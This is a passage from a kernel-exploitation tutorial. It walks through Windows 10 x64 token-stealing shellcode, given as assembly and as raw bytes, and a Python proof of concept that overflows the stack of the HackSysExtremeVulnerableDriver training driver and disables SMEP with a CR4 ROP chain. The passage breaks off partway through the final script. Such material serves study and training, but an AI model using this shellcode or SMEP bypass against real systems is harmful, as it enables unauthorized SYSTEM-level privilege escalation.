This returns a few fields of each process. We are most interested in the “process address”, which has been outlined in the image above at address 0xffffe60284651040. This is the address of the _EPROCESS structure for a specified process (the SYSTEM process in this case). After enumerating the process address, we can enumerate much more detailed information about the process using the _EPROCESS structure.

dt nt!_EPROCESS <Process address>

dt will display information about various variables, data types, etc. As you can see from the image above, various data types of the SYSTEM process’s _EPROCESS structure have been displayed. If you continue down the kd window in WinDbg, you will see the Token field, at an offset of _EPROCESS + 0x358.

What does this mean? That means for each process on Windows, the access token is located at an offset of 0x358 from the process address. We will for sure be using this information later. Before moving on, however, let’s take a look at how a Token is stored.

As you can see from the above image, there is something called _EX_FAST_REF, or an Executive Fast Reference union. The difference between a union and a structure, is that a union stores data types at the same memory location (notice there is no difference in the offset of the various fields to the base of an _EX_FAST_REF union as shown in the image below. All of them are at an offset of 0x000). This is what the access token of a process is stored in. Let’s take a closer look.

dt nt!_EX_FAST_REF

Take a look at the RefCnt element. This is a value, appended to the access token, that keeps track of references of the access token. On x86, this is 3 bits. On x64 (which is our current architecture) this is 4 bits, as shown above. We want to clear these bits out, using bitwise AND. That way, we just extract the actual value of the Token, and not other unnecessary metadata.

To extract the value of the token, we simply need to view the _EX_FAST_REF union of the SYSTEM process at an offset of 0x358 (which is where our token resides). From there, we can figure out how to go about clearing out RefCnt.

dt nt!_EX_FAST_REF <Process address>+0x358

As you can see, RefCnt is equal to 0y0111. 0y denotes a binary value. So this means RefCnt in this instance equals 7 in decimal.

So, let’s use bitwise AND to try to clear out those last few bits.

? TOKEN & 0xf

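As you can see, the result is 7. This is not the value we want- it is actually the inverse of it, since AND-ing with 0xf keeps only RefCnt and throws the rest of the token away. Logic tells us we should AND with the inverse (bitwise NOT) of 0xf instead, which is 0xfffffffffffffff0 (that is, -0x10). Be careful with -0xf here: in two’s complement it is 0xfffffffffffffff1, which leaves the lowest bit untouched.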
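
The masking logic can be sketched in Python. The _EX_FAST_REF value below is made up for illustration (only its low nibble of 0y0111 matches the RefCnt discussed above), and MASK_64 exists only because Python integers are not fixed at 64 bits. Note that the mask that clears all four low bits is the bitwise NOT of 0xf (0xfffffffffffffff0); the arithmetic negation -0xf ends in ...f1 and would leave bit 0 set.

```python
MASK_64 = 0xFFFFFFFFFFFFFFFF

# Hypothetical _EX_FAST_REF value; the low 4 bits (RefCnt) are 0y0111.
fast_ref = 0xffff8a0d12345677

# AND with 0xf keeps only RefCnt (the part we do NOT want).
ref_cnt = fast_ref & 0xf

# AND with the bitwise NOT of 0xf clears RefCnt and keeps the token pointer.
clear_mask = ~0xf & MASK_64
token = fast_ref & clear_mask

# For comparison: the two's complement negation of 0xf is a different mask.
minus_f = -0xf & MASK_64

print(ref_cnt)
print("{:#x}".format(token))
print("{:#x}".format(minus_f))
```

The shellcode later in this post gets the same effect with a one-byte mask, since the four RefCnt bits all live in the lowest byte of the register.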

So- we have finally extracted the value of the raw access token. At this point, let’s see what happens when we copy this token to a normal cmd.exe session.

Opening a new cmd.exe process on the debuggee machine:

After spawning a cmd.exe process on the debuggee, let’s identify the process address in the debugger.

!process 0 0 cmd.exe

As you can see, the process address for our cmd.exe process is located at 0xffffe6028694d580. We also know, based on our research earlier, that the Token of a process is located at an offset of 0x358 from the process address. Let’s use WinDbg to overwrite the cmd.exe access token with the access token of the SYSTEM process.

Now, let’s take a look back at our previous cmd.exe process.

As you can see, cmd.exe has become a privileged process! Now the only question remains- how do we do this dynamically with a piece of shellcode?

Assembly? Who Needs It. I Will Never Need To Know That- It’s iRrElEvAnT

‘Nuff said.

Anyways, let’s develop an assembly program that can dynamically perform the above tasks in x64.

So let’s start with this logic- instead of spawning a cmd.exe process and then copying the SYSTEM process access token to it- why don’t we just copy the access token to the current process when exploitation occurs? The current process during exploitation should be the process that triggers the vulnerability (the process where the exploit code is run from). From there, we could spawn cmd.exe from (and in context of) our current process after our exploit has finished. That cmd.exe process would then have administrative privilege.

Before we can get there though, let’s look into how we can obtain information about the current process.

If you use the Microsoft Docs (formerly known as MSDN) to look into process data structures you will come across this article. This article states there is a Windows API function that can identify the current process and return a pointer to it! PsGetCurrentProcess() is that function. This Windows API function identifies the current thread and then returns a pointer to the process in which that thread is found. This is identical to IoGetCurrentProcess(). However, Microsoft recommends users invoke PsGetCurrentProcess() instead. Let’s unassemble that function in WinDbg.

uf nt!PsGetCurrentProcess

Let’s take a look at the first instruction mov rax, qword ptr gs:[188h]. As you can see, the GS segment register is in use here. This register points to a data segment, used to access different types of data structures. If you take a closer look at this segment, at an offset of 0x188 bytes, you will see KiInitialThread. This is a pointer to the _KTHREAD entry in the current thread’s _ETHREAD structure. As a point of clarification, know that _KTHREAD is the first entry in the _ETHREAD structure. The _ETHREAD structure is the thread object for a thread (similar to how _EPROCESS is the process object for a process) and will display more granular information about a thread. nt!KiInitialThread is the address of that _ETHREAD structure. Let’s take a closer look.

dqs gs:[188h]

This shows the GS segment register, at an offset of 0x188, holds an address of 0xffffd500e0c0cc00 (different on your machine because of ASLR/KASLR). This should be the nt!KiInitialThread, or the _ETHREAD structure for the current thread. Let’s verify this with WinDbg.

!thread -p

As you can see, we have verified that nt!KiInitialThread represents the address of the current thread.

Recall what was mentioned about threads and processes earlier. Threads are the part of a process that actually perform execution of code (for our purposes, these are kernel threads). Now that we have identified the current thread, let’s identify the process associated with that thread (which would be the current process). Let’s go back to the image above where we unassembled the PsGetCurrentProcess() function.

mov rax, qword ptr [rax+0B8h]

RAX already contains the value of the GS segment register at an offset of 0x188 (which contains the current thread). The above assembly instruction will move the value of nt!KiInitialThread + 0xB8 into RAX. Logic tells us this has to be the location of our current process, as the only instruction left in the PsGetCurrentProcess() routine is a ret. Let’s investigate this further.

Since we believe this is going to be our current process, let’s view this data in an _EPROCESS structure.

dt nt!_EPROCESS poi(nt!KiInitialThread+0xb8)

First, a little WinDbg kung-fu. poi essentially dereferences a pointer, which means obtaining the value a pointer points to.

And as you can see, we have found where our current process is! At this time, the current process is the SYSTEM process (PID = 4). This is subject to change dependent on what is executing, etc. But, it is very important we are able to identify the current process.

Let’s start building out an assembly program that tracks what we are doing.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

_start:
	mov rax, [gs:0x188]		    ; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]	   	    ; Current process (_EPROCESS)
  	mov rbx, rax			    ; Copy current process (_EPROCESS) to rbx

Notice that I copied the current process, stored in RAX, into RBX as well. You will see why this is needed here shortly.

Take Me For A Loop!

Let’s take a look at a few more elements of the _EPROCESS structure.

dt nt!_EPROCESS

Let’s take a look at the data structure of ActiveProcessLinks, _LIST_ENTRY

dt nt!_LIST_ENTRY

ActiveProcessLinks is what keeps track of the list of current processes. How does it keep track of these processes you may be wondering? Its data structure is _LIST_ENTRY, a doubly linked list. This means that each element in the linked list not only points to the next element, but it also points to the previous one. Essentially, the elements point in each direction. As mentioned earlier and just as a point of reiteration, this linked list is responsible for keeping track of all active processes.

There are two elements of _EPROCESS we need to keep track of. The first element, located at an offset of 0x2e0 on Windows 10 x64, is UniqueProcessId. This is the PID of the process. The other element is ActiveProcessLinks, which is located at an offset 0x2e8.

So essentially what we can do in x64 assembly, is locate the current process from the aforementioned method of PsGetCurrentProcess(). From there, we can iterate and loop through the _EPROCESS structure’s ActiveProcessLinks element (which keeps track of every process via a doubly linked list). After reading in the current ActiveProcessLinks element, we can compare the current UniqueProcessId (PID) to the constant 4, which is the PID of the SYSTEM process. Let’s continue our already started assembly program.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

_start:
	mov rax, [gs:0x188]		; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]	   	; Current process (_EPROCESS)
  	mov rbx, rax			; Copy current process (_EPROCESS) to rbx
	
__loop:
	mov rbx, [rbx + 0x2e8] 		; ActiveProcessLinks
	sub rbx, 0x2e8		   	; Go back to current process (_EPROCESS)
	mov rcx, [rbx + 0x2e0] 		; UniqueProcessId (PID)
	cmp rcx, 4 			; Compare PID to SYSTEM PID 
	jnz __loop			; Loop until SYSTEM PID is found
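
If the pointer arithmetic in the loop is hard to picture, here is a rough Python model of it. Everything in it is a toy: the addresses, the PIDs other than 4, and the memory dictionary are invented, and the real list also contains a list head (nt!PsActiveProcessHead) that is ignored here. Only the two offsets come from the post.

```python
# Offsets from the post (they vary between Windows builds).
PID_OFFSET = 0x2e0      # _EPROCESS.UniqueProcessId
LINKS_OFFSET = 0x2e8    # _EPROCESS.ActiveProcessLinks (Flink is the first field)

# Toy "kernel memory": address -> QWORD. Bases and PIDs are made up.
processes = {0x1000: 4, 0x2000: 612, 0x3000: 4312}   # _EPROCESS base -> PID
bases = sorted(processes)
memory = {}
for i, base in enumerate(bases):
    next_base = bases[(i + 1) % len(bases)]
    memory[base + PID_OFFSET] = processes[base]
    # Flink points at the NEXT process's ActiveProcessLinks field,
    # not at the start of its _EPROCESS structure.
    memory[base + LINKS_OFFSET] = next_base + LINKS_OFFSET


def find_system_process(current_process):
    """Walk the list the same way the assembly loop does."""
    rbx = current_process
    while True:
        rbx = memory[rbx + LINKS_OFFSET]    # mov rbx, [rbx + 0x2e8]
        rbx -= LINKS_OFFSET                 # sub rbx, 0x2e8
        rcx = memory[rbx + PID_OFFSET]      # mov rcx, [rbx + 0x2e0]
        if rcx == 4:                        # cmp rcx, 4 / jnz __loop
            return rbx


system_process = find_system_process(0x3000)
print("{:#x}".format(system_process))
```

The sub rbx, 0x2e8 step is the part that is easy to miss: each link lands in the middle of the next _EPROCESS, so we have to back up to the start of the structure before reading the PID.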

Once the SYSTEM process’s _EPROCESS structure has been found, we can now go ahead and retrieve the token and copy it to our current process. This will unleash God mode on our current process. God, please have mercy on the soul of our poor little process.

Once we have found the SYSTEM process, remember that the Token element is located at an offset of 0x358 to the _EPROCESS structure of the process.

Let’s finish out the rest of our token stealing payload for Windows 10 x64.

; Windows 10 x64 Token Stealing Payload
; Author: Connor McGarr

[BITS 64]

_start:
	mov rax, [gs:0x188]		; Current thread (_KTHREAD)
	mov rax, [rax + 0xb8]		; Current process (_EPROCESS)
	mov rbx, rax			; Copy current process (_EPROCESS) to rbx
__loop:
	mov rbx, [rbx + 0x2e8] 		; ActiveProcessLinks
	sub rbx, 0x2e8		   	; Go back to current process (_EPROCESS)
	mov rcx, [rbx + 0x2e0] 		; UniqueProcessId (PID)
	cmp rcx, 4 			; Compare PID to SYSTEM PID 
	jnz __loop			; Loop until SYSTEM PID is found

	mov rcx, [rbx + 0x358]		; SYSTEM token is @ offset _EPROCESS + 0x358
	and cl, 0xf0			; Clear out _EX_FAST_REF RefCnt
	mov [rax + 0x358], rcx		; Copy SYSTEM token to current process

	xor rax, rax			; set NTSTATUS SUCCESS
	ret				; Done!

Notice our use of bitwise AND. We are clearing out the last 4 bits of the RCX register, via the CL register. If you have read my post about a socket reuse exploit, you will know I talk about using the lower byte registers of the x86 or x64 registers (RCX, ECX, CX, CH, CL, etc). The last 4 bits we need to clear out, in an x64 architecture, are located in the low or L 8-bit register (CL, AL, BL, etc).

As you can see also, we ended our shellcode by using bitwise XOR to clear out RAX. NTSTATUS uses RAX as the register for the error code. An NTSTATUS value of 0 means the operation was performed successfully.

Before we go ahead and show off our payload, let’s develop an exploit that outlines bypassing SMEP. We will use a stack overflow as an example, in the kernel, to outline using ROP to bypass SMEP.

SMEP Says Hello

What is SMEP? SMEP, or Supervisor Mode Execution Prevention, is a protection that was first implemented in Windows 8 (in context of Windows). When we talk about executing code for a kernel exploit, the most common technique is to allocate the shellcode in user mode and then call it from the kernel. This means the user mode code will be called in context of the kernel, giving us the applicable permissions to obtain SYSTEM privileges.

SMEP is a prevention that does not allow us to execute code stored in a ring 3 page from ring 0 (executing code from a higher ring in general). This means we cannot execute user mode code from kernel mode. In order to bypass SMEP, let’s understand how it is implemented.

SMEP policy is mandated/enabled via the CR4 register. According to Intel, the CR4 register is a control register. Each bit in this register is responsible for various features being enabled on the OS. The 20th bit of the CR4 register (bit 20, counting from zero) is responsible for SMEP being enabled. If the 20th bit of the CR4 register is set to 1, SMEP is enabled. When the bit is set to 0, SMEP is disabled. Let’s take a look at the CR4 register on Windows with SMEP enabled in normal hexadecimal format, as well as binary (so we can really see where that 20th bit resides).

r cr4

The CR4 register has a value of 0x00000000001506f8 in hexadecimal. Let’s view that in binary, so we can see where the 20th bit resides.

.formats cr4

As you can see, the 20th bit is outlined in the image above (counting from the right). Let’s use the .formats command again to see what the value in the CR4 register needs to be, in order to bypass SMEP.

As you can see from the above image, when the 20th bit of the CR4 register is flipped, the hexadecimal value would be 0x00000000000506f8.
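
The same arithmetic can be checked without a debugger. This is a small sketch using the two CR4 values from this post; the constant name SMEP_BIT is just a label chosen for this example.

```python
# CR4.SMEP is bit 20 when counting bits from zero.
SMEP_BIT = 1 << 20

cr4_smep_enabled = 0x1506f8          # value read from "r cr4" in the post

# Clear only the SMEP bit and leave every other feature bit alone.
cr4_smep_disabled = cr4_smep_enabled & ~SMEP_BIT

print("{:#x}".format(SMEP_BIT))
print("{:#x}".format(cr4_smep_disabled))
print(bool(cr4_smep_enabled & SMEP_BIT), bool(cr4_smep_disabled & SMEP_BIT))
```

Keep in mind that 0x506f8 is only correct for a machine whose CR4 started at 0x1506f8. On a different system the other bits may differ, so the safer habit is to read CR4 first and clear just this one bit.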

This post will cover how to bypass SMEP via ROP using the above information. Before we do, let’s talk a bit more about SMEP implementation and other potential bypasses.

SMEP is ENFORCED via the page table entry (PTE) of a memory page through the form of “flags”. Recall that a page table is what contains information about which part of physical memory maps to virtual memory. The PTE for a memory page has various flags that are associated with it. Two of those flags are U, for user mode or S, for supervisor mode (kernel mode). This flag is checked when said memory is accessed by the memory management unit (MMU). Before we move on, let’s talk about CPU modes for a second. Ring 3 is responsible for user mode application code. Ring 0 is responsible for operating system level code (kernel mode). The CPU can transition its current privilege level (CPL) based on what is executing. I will not get into the lower level details of syscalls, sysrets, or other various routines that occur when the CPU changes the CPL. This is also not a blog on how paging works. If you are interested in learning more, I HIGHLY suggest the book What Makes It Page: The Windows 7 (x64) Virtual Memory Manager by Enrico Martignetti. Although this is specific to Windows 7, I believe these same concepts apply today. I give this background information, because SMEP bypasses could potentially abuse this functionality.

Think of the implementation of SMEP as the following:

Laws are created by the government. HOWEVER, the legislatures do not roam the streets enforcing the law. This is the job of our police force.

The same concept applies to SMEP. SMEP is enabled by the CR4 register- but the CR4 register does not enforce it. That is the job of the page table entries.

Why bring this up? Although we will be outlining a SMEP bypass via ROP, let’s consider another scenario. Let’s say we have an arbitrary read and write primitive. Put aside the fact that PTEs are randomized for now. What if you had a read primitive to know where the PTE for the memory page of your shellcode was? Another potential (and interesting) way to bypass SMEP would be not to “disable SMEP” at all. Let’s think outside the box! Instead of “going to the mountain”- why not “bring the mountain to us”? We could potentially use our read primitive to locate our user mode shellcode page, and then use our write primitive to overwrite the PTE for our shellcode and flip the U (usermode) flag into an S (supervisor mode) flag! That way, when that particular address is executed although it is a “user mode address”, it is still executed because now the permissions of that page are that of a kernel mode page.

Although page table entries are randomized now, this presentation by Morten Schenk of Offensive Security talks about derandomizing page table entries.

Morten explains the steps as the following, if you are too lazy to read his work:

  1. Obtain read/write primitive
  2. Leak ntoskrnl.exe (kernel base)
  3. Locate MiGetPteAddress() (can be done dynamically instead of static offsets)
  4. Use PTE base to obtain PTE of any memory page
  5. Change bit (whether it is copying shellcode to page and flipping NX bit or flipping U/S bit of a user mode page)
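
Steps 4 and 5 boil down to a little arithmetic, sketched here in Python. Treat this as an illustration under assumptions, not as code from Morten’s work: the shift-and-mask formula is the commonly documented calculation performed by MiGetPteAddress(), PTE_BASE_DEFAULT is the historical, non-randomized PTE base (on a randomized system you would have to leak the real one), and the sample PTE value is invented. The bit positions for U/S (bit 2) and NX (bit 63) are the architectural x64 ones.

```python
# Historical, non-randomized PTE base. Assumption for illustration only.
PTE_BASE_DEFAULT = 0xFFFFF68000000000

USER_BIT = 1 << 2     # U/S flag: 1 = user page, 0 = supervisor page
NX_BIT = 1 << 63      # no-execute flag


def pte_address(virtual_address, pte_base=PTE_BASE_DEFAULT):
    """Address of the PTE that describes virtual_address."""
    return ((virtual_address >> 9) & 0x7FFFFFFFF8) + pte_base


def make_supervisor(pte_value):
    """Flip a user page into a supervisor page by clearing U/S."""
    return pte_value & ~USER_BIT


# 0xb70000 is the user mode shellcode address that shows up later in this post.
shellcode_pte = pte_address(0xb70000)

# Made-up PTE contents for a user mode page.
old_pte = 0x0000000012345867
new_pte = make_supervisor(old_pte)

print("{:#x}".format(shellcode_pte))
print("{:#x} -> {:#x}".format(old_pte, new_pte))
```

With a write primitive, new_pte would be written to shellcode_pte. SMEP stays enabled in CR4 the whole time; the page simply no longer looks like a user mode page.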

Again, I will not be covering this method of bypassing SMEP until I have done more research on memory paging in Windows. See the end of this blog for my thoughts on other SMEP bypasses going forward.

SMEP Says Goodbye

Let’s use an overflow to outline bypassing SMEP with ROP. ROP assumes we have control over the stack (as each ROP gadget returns back to the stack). Since SMEP is enabled, our ROP gadgets will need to come from kernel mode pages. Since we are assuming medium integrity here, we can call EnumDeviceDrivers() to obtain the kernel base- which bypasses KASLR.

Essentially, here is how our ROP chain will work

-------------------
pop <reg> ; ret
-------------------
VALUE_WANTED_IN_CR4 (0x506f8) - This can be our own user supplied value.
-------------------
mov cr4, <reg> ; ret
-------------------
User mode payload address
-------------------

Let’s go hunting for these ROP gadgets. (NOTE - ALL OFFSETS TO ROP GADGETS WILL VARY DEPENDING ON OS, PATCH LEVEL, ETC.) Remember, these ROP gadgets need to be kernel mode addresses. We will use rp++ to enumerate rop gadgets in ntoskrnl.exe. If you take a look at my post about ROP, you will see how to use this tool.

Let’s figure out a way to control the contents of the CR4 register. Although we probably won’t be able to manipulate the contents of the register directly, perhaps we can move the contents of a register that we can control into the CR4 register. Recall that a pop <reg> operation will take the contents of the next item on the stack, and store it in the register following the pop operation. Let’s keep this in mind.

Using rp++, we have found a nice ROP gadget in ntoskrnl.exe, that allows us to store the contents of the ECX register (the lower 32 bits of the RCX register) in CR4.

As you can see, this ROP gadget is “located” at 0x140108552. However, since this is a kernel mode address- rp++ (from usermode and not run as an administrator) will not give us the full address of this. However, if you remove the first 3 hex digits (0x140), the rest of the “address” is really an offset from the kernel base. This means this ROP gadget is located at ntoskrnl.exe + 0x108552.
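
Here is a short sketch of that conversion in Python. It assumes rp++ printed the address relative to an image base of 0x140000000, which is what the leading 0x140 in the output above suggests. The kernel base used at the end is a made-up placeholder; in the exploit it comes from EnumDeviceDrivers().

```python
# Image base implied by the rp++ output above (assumption).
RP_IMAGE_BASE = 0x140000000


def gadget_offset(rp_address):
    """Turn an address printed by rp++ into an offset from the image base."""
    return rp_address - RP_IMAGE_BASE


def rebase(rp_address, kernel_base):
    """Runtime address of the gadget once the real kernel base is known."""
    return kernel_base + gadget_offset(rp_address)


offset = gadget_offset(0x140108552)

# Placeholder kernel base for illustration only.
example_base = 0xfffff80000000000
runtime_address = rebase(0x140108552, example_base)

print("{:#x}".format(offset))
print("{:#x}".format(runtime_address))
```

Storing offsets instead of absolute addresses is what lets the same ROP chain work across reboots, since KASLR only changes the base.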

Awesome! rp++ was a bit wrong in its enumeration. rp++ says that we can put ECX into the CR4 register. However, upon further inspection, we can see this ROP gadget ACTUALLY points to a mov cr4, rcx instruction. This is perfect for our use case! We have a way to move the contents of the RCX register into the CR4 register. You may be asking “Okay, we can control the CR4 register via the RCX register- but how does this help us?” Recall one of the properties of ROP from my previous post. Whenever we had a nice ROP gadget that allowed a desired instruction, but there was an unnecessary pop in the gadget, we used filler data of NOPs. This is because we are just simply placing data in a register- we are not executing it.

The same principle applies here. If we can pop our intended flag value into RCX, we should have no problem. As we saw before, our intended CR4 register value should be 0x506f8.

Real quick- let’s say rp++ was right in that we could only control the contents of the ECX register (instead of RCX). Would this affect us?

Recall, however, how the registers work here.

-----------------------------------
               RCX
-----------------------------------
                       ECX
-----------------------------------
                             CX
-----------------------------------
                           CH    CL
-----------------------------------

This means, even though RCX contains 0x00000000000506f8, a mov cr4, ecx would take the lower 32-bits of RCX (which is ECX) and place it into the CR4 register. This would mean ECX would equal 0x000506f8- and that value would end up in CR4. So even though we would theoretically be using both RCX and ECX, due to lack of pop ecx ROP gadgets, we will be unaffected!
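
The register diagram can also be expressed as masks. This is just a Python sketch of how the sub-registers overlay RCX, using the CR4 value from this post.

```python
rcx = 0x00000000000506f8

ecx = rcx & 0xFFFFFFFF        # lower 32 bits of RCX
cx = rcx & 0xFFFF             # lower 16 bits
cl = rcx & 0xFF               # lowest byte
ch = (rcx >> 8) & 0xFF        # second-lowest byte

for name, value in (("ecx", ecx), ("cx", cx), ("ch", ch), ("cl", cl)):
    print("{} = {:#x}".format(name, value))
```

Because the intended CR4 value fits comfortably in 32 bits, ECX and RCX hold the same number here, which is why the distinction does not matter for this chain.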

Now, let’s continue on to controlling the RCX register.

Let’s find a pop rcx gadget!

Nice! We have a ROP gadget located at ntoskrnl.exe + 0x3544. Let’s update our POC with some breakpoints where our user mode shellcode will reside, to verify we can hit our shellcode. This POC takes care of the semantics such as finding the offset to the ret instruction we are overwriting, etc.

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi


payload = bytearray(
    "\xCC" * 50
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
# We also need to bypass SMEP before calling this shellcode
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

# Need kernel leak to bypass KASLR
# Using Windows API to enumerate base addresses
# We need kernel mode ROP gadgets

# c_ulonglong because of x64 size (unsigned __int64)
base = (c_ulonglong * 1024)()

print "[+] Calling EnumDeviceDrivers()..."

get_drivers = psapi.EnumDeviceDrivers(
    byref(base),                      # lpImageBase (array that receives list of addresses)
    sizeof(base),                     # cb (size of lpImageBase array, in bytes)
    byref(c_long())                   # lpcbNeeded (bytes returned in the array)
)

# Error handling if function fails (EnumDeviceDrivers() returns 0 on failure)
if not get_drivers:
    print "[-] EnumDeviceDrivers() function call failed!"
    sys.exit(-1)

# The first entry in the array with device drivers is ntoskrnl base address
kernel_address = base[0]

print "[+] Found kernel leak!"
print "[+] ntoskrnl.exe base address: {0}".format(hex(kernel_address))

# Offset to ret overwrite
input_buffer = "\x41" * 2056

# SMEP says goodbye
print "[+] Starting ROP chain. Goodbye SMEP..."
input_buffer += struct.pack('<Q', kernel_address + 0x3544)      # pop rcx; ret

print "[+] Flipped SMEP bit to 0 in RCX..."
input_buffer += struct.pack('<Q', 0x506f8)           		# Intended CR4 value

print "[+] Placed disabled SMEP value in CR4..."
input_buffer += struct.pack('<Q', kernel_address + 0x108552)    # mov cr4, rcx ; ret

print "[+] SMEP disabled!"
input_buffer += struct.pack('<Q', ptr)                          # Location of user mode shellcode

input_buffer_length = len(input_buffer)

# 0x222003 = IOCTL code that will jump to TriggerStackOverflow() function
# Getting handle to driver to return to DeviceIoControl() function
print "[+] Using CreateFileA() to obtain and return handle referencing the driver..."
handle = kernel32.CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver", # lpFileName
    0xC0000000,                         # dwDesiredAccess
    0,                                  # dwShareMode
    None,                               # lpSecurityAttributes
    0x3,                                # dwCreationDisposition
    0,                                  # dwFlagsAndAttributes
    None                                # hTemplateFile
)

# Sending our buffer to the driver with the 0x222003 IOCTL (TriggerStackOverflow())
print "[+] Interacting with the driver..."
kernel32.DeviceIoControl(
    handle,                             # hDevice
    0x222003,                           # dwIoControlCode
    input_buffer,                       # lpInBuffer
    input_buffer_length,                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped
)

Let’s take a look in WinDbg.

As you can see, we have hit the ret we are going to overwrite.

Before we step through, let’s view the call stack- to see how execution will proceed.

k

Open the image above in a new tab if you are having trouble viewing.

To help better understand the output of the call stack, the column Call Site is going to be the memory address that is executed. The RetAddr column is where the Call Site address will return to when it is done completing.

As you can see, the compromised ret is located at HEVD!TriggerStackOverflow+0xc8. From there we will return to 0xfffff80302c82544, or AuthzBasepRemoveSecurityAttributeValueFromLists+0x70. The next value in the RetAddr column, is the intended value for our CR4 register, 0x00000000000506f8.

Recall that a ret instruction will load the value RSP points to (the top of the stack) into RIP. Therefore, since our intended CR4 value is located on the stack, technically our first ROP gadget would “return” to 0x00000000000506f8. However, the pop rcx will take that value off of the stack and place it into RCX. Meaning we do not have to worry about returning to that value, which is not a valid memory address.
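
To see why 0x506f8 is never “returned” to, here is a tiny Python model of the chain. It is only a simulation: the function run_chain() and the register dictionary are invented for this sketch, and the three addresses are the ones visible in the call stack in this post.

```python
POP_RCX = 0xfffff80302c82544      # pop rcx ; ret
MOV_CR4 = 0xfffff80302d87552      # mov cr4, rcx ; ret
SHELLCODE = 0x0000000000b70000    # user mode payload


def run_chain(stack, cr4=0x1506f8):
    """Follow ret/pop semantics over a list of QWORDs."""
    regs = {'rcx': 0, 'cr4': cr4}
    visited = []
    sp = 0

    # The overwritten ret: load the QWORD at the top of the stack into RIP.
    rip = stack[sp]
    sp += 1

    while rip in (POP_RCX, MOV_CR4):
        visited.append(rip)
        if rip == POP_RCX:
            regs['rcx'] = stack[sp]   # pop consumes the next QWORD as data
            sp += 1
        else:
            regs['cr4'] = regs['rcx']
        rip = stack[sp]               # the gadget's trailing ret
        sp += 1

    visited.append(rip)               # first address that is not a gadget
    return regs, visited


regs, visited = run_chain([POP_RCX, 0x506f8, MOV_CR4, SHELLCODE])
print("cr4 = {:#x}".format(regs['cr4']))
print([hex(address) for address in visited])
```

The CR4 value sits on the stack between two gadget addresses, but pop rcx eats it as data before the next ret runs, so execution only ever lands on the two gadgets and then the shellcode.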

Upon the ret from the pop rcx ROP gadget, we will jump into the next ROP gadget, mov cr4, rcx, which will load RCX into CR4. That ROP gadget is located at 0xfffff80302d87552, or KiFlushCurrentTbWorker+0x12. To finish things out, we have the location of our user mode code, at 0x0000000000b70000.
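
As a sanity check, both runtime addresses from the call stack should point back to the same kernel base once the gadget offsets are subtracted. This sketch uses only numbers that already appear in this post.

```python
# Runtime addresses from the call stack above.
pop_rcx_runtime = 0xfffff80302c82544
mov_cr4_runtime = 0xfffff80302d87552

# Gadget offsets from ntoskrnl.exe found with rp++.
POP_RCX_OFFSET = 0x3544
MOV_CR4_OFFSET = 0x108552

base_from_pop = pop_rcx_runtime - POP_RCX_OFFSET
base_from_mov = mov_cr4_runtime - MOV_CR4_OFFSET

print("{:#x}".format(base_from_pop))
print("{:#x}".format(base_from_mov))
print(base_from_pop == base_from_mov)
```

Both subtractions give the same page-aligned address, which is what we would expect if EnumDeviceDrivers() handed us the correct ntoskrnl.exe base.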

After stepping through the vulnerable ret instruction, we see we have hit our first ROP gadget.

Now that we are here, stepping through should pop our intended CR4 value into RCX

Perfect. Stepping through, we should land on our next ROP gadget- which will move RCX (desired value to disable SMEP) into CR4.

Perfect! Let’s disable SMEP!

Nice! As you can see, after our ROP gadgets are executed - we hit our breakpoints (placeholder for our shellcode to verify SMEP is disabled)!

This means we have successfully disabled SMEP, and we can execute usermode shellcode! Let’s finalize this exploit with a working POC. We will merge our payload concepts with the exploit now! Let’s update our script with weaponized shellcode!

import struct
import sys
import os
from ctypes import *

kernel32 = windll.kernel32
ntdll = windll.ntdll
psapi = windll.Psapi


payload = bytearray(
    "\x65\x48\x8B\x04\x25\x88\x01\x00\x00"              # mov rax,[gs:0x188]  ; Current thread (KTHREAD)
    "\x48\x8B\x80\xB8\x00\x00\x00"                      # mov rax,[rax+0xb8]  ; Current process (EPROCESS)
    "\x48\x89\xC3"                                      # mov rbx,rax         ; Copy current process to rbx
    "\x48\x8B\x9B\xE8\x02\x00\x00"                      # mov rbx,[rbx+0x2e8] ; ActiveProcessLinks
    "\x48\x81\xEB\xE8\x02\x00\x00"                      # sub rbx,0x2e8       ; Go back to current process
    "\x48\x8B\x8B\xE0\x02\x00\x00"                      # mov rcx,[rbx+0x2e0] ; UniqueProcessId (PID)
    "\x48\x83\xF9\x04"                                  # cmp rcx,byte +0x4   ; Compare PID to SYSTEM PID
    "\x75\xE5"                                          # jnz 0x13            ; Loop until SYSTEM PID is found
    "\x48\x8B\x8B\x58\x03\x00\x00"                      # mov rcx,[rbx+0x358] ; SYSTEM token is @ offset _EPROCESS + 0x358
    "\x80\xE1\xF0"                                      # and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
    "\x48\x89\x88\x58\x03\x00\x00"                      # mov [rax+0x358],rcx ; Copy SYSTEM token to current process
    "\x48\x83\xC4\x40"                                  # add rsp, 0x40       ; RESTORE (Specific to HEVD)
    "\xC3"                                              # ret                 ; Done!
)

# Defeating DEP with VirtualAlloc. Creating RWX memory, and copying our shellcode in that region.
# We also need to bypass SMEP before calling this shellcode
print "[+] Allocating RWX region for shellcode"
ptr = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(payload)),              # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect
)

# Creates a ctype variant of the payload (from_buffer)
c_type_buffer = (c_char * len(payload)).from_buffer(payload)

print "[+] Copying shellcode to newly allocated RWX region"
kernel32.RtlMoveMemory(
    c_int(ptr),                       # Destination (pointer)
    c_type_buffer,                    # Source (pointer)
    c_int(len(payload))               # Length
)

